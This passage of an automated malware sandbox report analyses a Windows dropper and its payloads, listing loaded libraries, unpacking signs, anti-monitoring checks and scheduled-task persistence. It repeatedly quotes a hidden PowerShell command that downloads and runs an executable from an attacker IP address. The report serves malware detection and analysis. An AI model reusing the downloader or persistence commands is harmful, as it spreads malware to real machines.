                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: uw7A6EF76R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Htem.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb,V source: powershell.exe, 00000008.00000002.1004489959.0000020058E30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: uw7A6EF76R.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: uw7A6EF76R.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: uw7A6EF76R.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: uw7A6EF76R.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: uw7A6EF76R.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEUnpacked PE file: 10.2.TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 11.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 12.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEUnpacked PE file: 13.2.TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 22.2.rapes.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pourftpu:EW;cybaxvbc:EW;.taggant:EW;
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: rapes.exe.10.drStatic PE information: real checksum: 0x1e5015 should be: 0x1d9168
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: real checksum: 0x1e5015 should be: 0x1d9168
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name:
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: .idata
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name:
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: pourftpu
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: cybaxvbc
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: .taggant
                  Source: rapes.exe.10.drStatic PE information: section name:
                  Source: rapes.exe.10.drStatic PE information: section name: .idata
                  Source: rapes.exe.10.drStatic PE information: section name:
                  Source: rapes.exe.10.drStatic PE information: section name: pourftpu
                  Source: rapes.exe.10.drStatic PE information: section name: cybaxvbc
                  Source: rapes.exe.10.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ABE953 push eax; iretd 0_2_00ABE958
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC0A76 push ecx; ret 0_2_00AC0A89
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0164A pushad ; ret 0_2_00B0164B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF9C15A00BD pushad ; iretd 8_2_00007FF9C15A00C1
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F19FD5 push ecx; ret 22_2_00F19FD4
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: entropy: 7.973885483229057
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: pourftpu entropy: 7.954503184597595
                  Source: rapes.exe.10.drStatic PE information: section name: entropy: 7.973885483229057
                  Source: rapes.exe.10.drStatic PE information: section name: pourftpu entropy: 7.954503184597595

                  Persistence and Installation Behavior

                  barindex
                  Tries to download and execute files (via powershell)
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEJump to dropped file
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B31C41
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
